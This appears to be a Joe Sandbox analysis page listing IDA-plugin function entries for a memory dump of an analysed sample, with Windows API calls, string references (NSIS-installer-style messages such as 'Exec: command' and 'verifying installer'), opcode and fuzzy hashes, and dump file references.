                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                              • API String ID: 3734993849-2769509956
                                                                                                                                                                                                                                                                                              • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                                              • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                                                                                                                              Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                              • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                                              • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                                                                                                                              Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                                                                                                              • API String ID: 1033533793-945480824
                                                                                                                                                                                                                                                                                              • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                                              • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                                                                                                                              Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                              • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                              • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                                              • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                                                                                                                              Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                              • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                                              • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                                                                                                                              Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00019C00,00000064,?), ref: 00403295
                                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                              • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                                              • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                                                                                                                              Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                              • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                                                                                                              • API String ID: 3540041739-1813061909
                                                                                                                                                                                                                                                                                              • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                                              • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                                                                                                                              Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                                              • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                                              • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                              • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                                              • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                                                                                                                              Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                              • String ID:
